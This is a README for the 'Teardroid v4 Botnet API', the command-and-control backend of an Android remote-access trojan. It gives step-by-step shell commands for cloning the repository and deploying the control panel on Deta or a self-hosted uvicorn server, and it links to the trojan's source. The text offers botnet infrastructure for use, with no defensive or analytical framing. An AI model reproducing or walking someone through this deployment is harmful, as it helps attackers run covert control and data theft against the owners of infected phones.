Teardroid v4 Botnet API
This api is for teardroid v4 botnet
Please visit https://github.com/ScRiPt1337/Teardroid-phprat to know about teardroid and how to use it
- Set up an account at deta.sh
- Install Deta Cli
- Logging in to Deta via the CLI
- Create a new Python Micro using the command below
$ deta new --python teardroid_control # its will create an teardroid_control folder
- Clone Teardroidv4_api repo using the command below
$ git clone https://github.com/ScRiPt1337/Teardroidv4_api
- Move all Teardroidv4_api Files to teardroid_control folder using the command below
$ cd Teardroidv4_api
$ cp -r * ../teardroid_control/
- Deploy the Control panel using the following command.
$ deta deploy
- Clone Teardroidv4_api repo using the command below
$ git clone https://github.com/ScRiPt1337/Teardroidv4_api
- Install uvicorn
$ sudo apt-get install uvicorn
$ python3 -m pip install uvicorn
- Change dir to Teardroidv4_api
$ cd Teardroidv4_api
- Install all dependency
$ pip install -r requirements.txt
- Run teardroid api
$ screen
# press enter to go inside the screen session
$ uvicorn main:app --host 0.0.0.0 --port 80
# now close your terminal windows and we are good to go
- Done